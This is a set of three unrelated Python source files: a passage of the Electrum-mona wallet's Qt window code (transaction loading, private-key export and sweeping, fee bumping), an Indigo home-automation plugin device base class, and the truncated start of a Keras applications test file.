self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum_mona import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-mona-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... self.show_message(repr(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.storage.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None: total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): out_amt = max_fee - fee_e.get_amount() out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_e.get_amount() comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) # new_tx.set_rbf(True) new_tx.set_rbf(False) self.show_transaction(new_tx) def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(txid) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate) except CannotBumpFee as e: self.show_error(str(e)) return #if is_final: # new_tx.set_rbf(True) new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
RPFrameworkDevice.py
#! /usr/bin/env python # -*- coding: utf-8 -*- #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkDevice by RogueProeliator <adam.d.ashe@gmail.com> # Base class for all RogueProeliator's devices created by plugins for Perceptive # Automation's Indigo software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # Version 0: # Initial release of the device framework # Version 4: # Added support for child devices # Version 8: # Added support for reconnection attempts via plugin's command queue # Version 13: # Added ability to specify new device states that are added via upgrades; if any # of these states don't exist at device started, the device states will be reloaded # via a call to stateListOrDisplayStateIdChanged # Version 17: # Added unicode support # Changed error messages to the new plugin-based logErrorMessage # #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Python imports #///////////////////////////////////////////////////////////////////////////////////////// import functools import indigo import Queue import random import threading import time import RPFrameworkCommand import RPFrameworkPlugin import RPFrameworkThread import RPFrameworkUtils #///////////////////////////////////////////////////////////////////////////////////////// # Constants and configuration variables #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkDevice # Base class for Indigo plugin devices that provides standard functionality such as # multi-threaded communications and attribute management #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// class RPFrameworkDevice(object): #///////////////////////////////////////////////////////////////////////////////////// # Class construction and destruction methods #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Constructor called once upon plugin class receiving a command to start device # communication. The plugin will call other commands when needed, simply zero out the # member variables #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def __init__(self, plugin, device): self.hostPlugin = plugin self.indigoDevice = device self.childDevices = dict() self.deviceInstanceIdentifier = random.getrandbits(16) self.dbConn = None self.commandQueue = Queue.Queue() self.concurrentThread = None self.failedConnectionAttempts = 0 self.emptyQueueProcessingThreadSleepTime = 0.1 self.upgradedDeviceStates = list() self.upgradedDeviceProperties = list() #///////////////////////////////////////////////////////////////////////////////////// # Validation and GUI functions #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine is called to retrieve a dynamic list of elements for an action (or # other ConfigUI based) routine #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def getConfigDialogMenuItems(self, filter, valuesDict, typeId, targetId): return [] #///////////////////////////////////////////////////////////////////////////////////// # Public communication-interface methods methods #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This call will be made from the plugin in order to start the communications with the # hardware device... this will spin up the concurrent processing thread. #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def initiateCommunications(self, initializeConnect=True): # determine if this device is missing any properties that were added # during device/plugin upgrades propertiesDictUpdateRequired = False pluginPropsCopy = self.indigoDevice.pluginProps for newPropertyDefn in self.upgradedDeviceProperties: if not (newPropertyDefn[0] in pluginPropsCopy): self.hostPlugin.logger.info(u'Triggering property update due to missing device property: ' + RPFrameworkUtils.to_unicode(newPropertyDefn[0])) pluginPropsCopy[newPropertyDefn[0]] = newPropertyDefn[1] propertiesDictUpdateRequired = True # safeguard in case the device doesn't get updated... self.indigoDevice.pluginProps[newPropertyDefn[0]] = newPropertyDefn[1] if propertiesDictUpdateRequired == True: self.indigoDevice.replacePluginPropsOnServer(pluginPropsCopy) # determine if this device is missing any states that were defined in upgrades stateReloadRequired = False for newStateName in self.upgradedDeviceStates: if not (newStateName in self.indigoDevice.states): self.hostPlugin.logger.info(u'Triggering state reload due to missing device state: ' + RPFrameworkUtils.to_unicode(newStateName)) stateReloadRequired = True if stateReloadRequired == True: self.indigoDevice.stateListOrDisplayStateIdChanged(); # start concurrent processing thread by injecting a placeholder # command to the queue if initializeConnect == True: self.queueDeviceCommand(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_INITIALIZE_CONNECTION)) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will shut down communications with the hardware device #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def terminateCommunications(self): self.hostPlugin.logger.debug(u'Initiating shutdown of communications with ' + RPFrameworkUtils.to_unicode(self.indigoDevice.name)) if not (self.concurrentThread is None) and self.concurrentThread.isAlive() == True: self.concurrentThread.terminateThread() self.concurrentThread.join() self.concurrentThread = None self.hostPlugin.logger.debug(u'Shutdown of communications with ' + RPFrameworkUtils.to_unicode(self.indigoDevice.name) + u' complete') #///////////////////////////////////////////////////////////////////////////////////// # Queue and command processing methods #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Add new command to queue, which is polled and emptied by # concurrentCommandProcessingThread funtion #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def queueDeviceCommand(self, command): self.commandQueue.put(command) # if connection to the device has not started, or has timed out, then start up a # concurrent thread to handle communications if self.concurrentThread is None or self.concurrentThread.isAlive() == False: self.concurrentThread = RPFrameworkThread.RPFrameworkThread(target=functools.partial(self.concurrentCommandProcessingThread, self.commandQueue)) self.concurrentThread.start() #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Add new commands to queue as a list, ensuring that they are executed in-order #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def queueDeviceCommands(self, commandList): for rpCmd in commandList: self.queueDeviceCommand(rpCmd) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine is designed to run in a concurrent thread and will continuously monitor # the commands queue for work to do. #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def concurrentCommandProcessingThread(self, commandQueue): pass #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will process a device's reconnection attempt... note that by default # a device will NOT attempt to re-initialize communications; it must be enabled via # the GUI Configuration #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def scheduleReconnectionAttempt(self): self.hostPlugin.logger.debug(u'Scheduling reconnection attempt...') try: self.failedConnectionAttempts = self.failedConnectionAttempts + 1 maxReconnectAttempts = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_LIMIT, u'0')) if self.failedConnectionAttempts > maxReconnectAttempts: self.hostPlugin.logger.debug(u'Maximum reconnection attempts reached (or not allowed) for device ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id)) else: reconnectAttemptDelay = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_DELAY, u'60')) reconnectAttemptScheme = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME, RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME_REGRESS) if reconnectAttemptScheme == RPFrameworkPlugin.GUI_CONFIG_RECONNECTIONATTEMPT_SCHEME_FIXED: reconnectSeconds = reconnectAttemptDelay else: reconnectSeconds = reconnectAttemptDelay * self.failedConnectionAttempts reconnectAttemptTime = time.time() + reconnectSeconds self.hostPlugin.pluginCommandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_DEVICE_RECONNECT, commandPayload=(self.indigoDevice.id, self.deviceInstanceIdentifier, reconnectAttemptTime))) self.hostPlugin.logger.debug(u'Reconnection attempt scheduled for ' + RPFrameworkUtils.to_unicode(reconnectSeconds) + u' seconds') except e: self.hostPlugin.logger.error(u'Failed to schedule reconnection attempt to device') #///////////////////////////////////////////////////////////////////////////////////// # Device hierarchy (parent/child relationship) routines #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will generate the key to use in the managed child devices dictionary #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def getChildDeviceKeyByDevice(self, device): # the key into the dictionary will be specified by the GUI configuration variable # of THIS (parent) device... by default it will just be the child device's ID childDeviceKey = self.hostPlugin.substituteIndigoValues(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, RPFrameworkPlugin.GUI_CONFIG_CHILDDICTIONARYKEYFORMAT, u''), device, None) if childDeviceKey == u'': childDeviceKey = RPFrameworkUtils.to_unicode(device.indigoDevice.id) return childDeviceKey #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will add a new child device to the device; the parameter will be of # RPFrameworkDevice descendant #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def addChildDevice(self, device): self.hostPlugin.logger.threaddebug(u'Adding child device ' + RPFrameworkUtils.to_unicode(device.indigoDevice.id) + u' to ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id)) # the key into the dictionary will be specified by the GUI configuration variable childDeviceKey = self.getChildDeviceKeyByDevice(device) self.hostPlugin.logger.threaddebug(u'Created device key: ' + childDeviceKey) # add the device to the list of those managed by this device... self.childDevices[childDeviceKey] = device #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will remove a child device from the list of managed devices; note that # the plugin continues to handle all device lifecycle calls! #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def removeChildDevice(self, device): self.hostPlugin.logger.threaddebug(u'Removing child device ' + RPFrameworkUtils.to_unicode(device.indigoDevice.id) + u' from ' + RPFrameworkUtils.to_unicode(self.indigoDevice.id)) # the key into the dictionary will be specified by the GUI configuration variable childDeviceKey = self.getChildDeviceKeyByDevice(device) # remove the device... del self.childDevices[childDeviceKey] #///////////////////////////////////////////////////////////////////////////////////// # Utility routines #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will reload the Indigo device from the database; useful if we need to # get updated states or information #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def reloadIndigoDevice(self): self.indigoDevice = indigo.devices[self.indigoDevice.id] #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will update both the device's state list and the server with the new # device states #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- def updateStatesForDevice(self, statesToUpdate): for updateValue in statesToUpdate: self.indigoDevice.states[updateValue["key"]] = updateValue["value"] self.indigoDevice.updateStatesOnServer(statesToUpdate)
applications_test.py
import pytest import numpy as np import time import random import os from multiprocessing import Process, Queue from keras.utils.test_utils import keras_test from keras.utils.test_utils import layer_test from keras.utils.generic_utils import CustomObjectScope from keras.models import Sequential from keras import applications from keras import backend as K pytestmark = pytest.mark.skipif( os.environ['CORE_CHANGED'] == 'False' and os.environ['APP_CHANGED'] == 'False', reason='runs only when the relevant files have been modified') DENSENET_LIST = [(applications.DenseNet121, 1024), (applications.DenseNet169, 1664), (applications.DenseNet201, 1920)] NASNET_LIST = [(applications.NASNetMobile, 1056), (applications.NASNetLarge, 4032)] def clean_run(model_fn): if K.backend() == 'cntk': # Create model in a subprocess so that the memory consumed by InceptionResNetV2 will be # released back to the system after this test (to deal with OOM error on CNTK backend) # TODO: remove the use of multiprocessing from these tests once a memory clearing mechanism # is implemented in the CNTK backend def target(queue): model = model_fn() queue.put(model.output_shape) queue = Queue() p = Process(target=target, args=(queue,)) p.start() p.join() # The error in a subprocess won't propagate to the main process, so we check if the model # is successfully created by checking if the output shape has been put into the queue assert not queue.empty(), 'Model creation failed.' return queue.get_nowait() else: model = model_fn() return model.output_shape @keras_test def test_resnet50(): model = applications.ResNet50(weights=None) assert model.output_shape == (None, 1000) @keras_test def 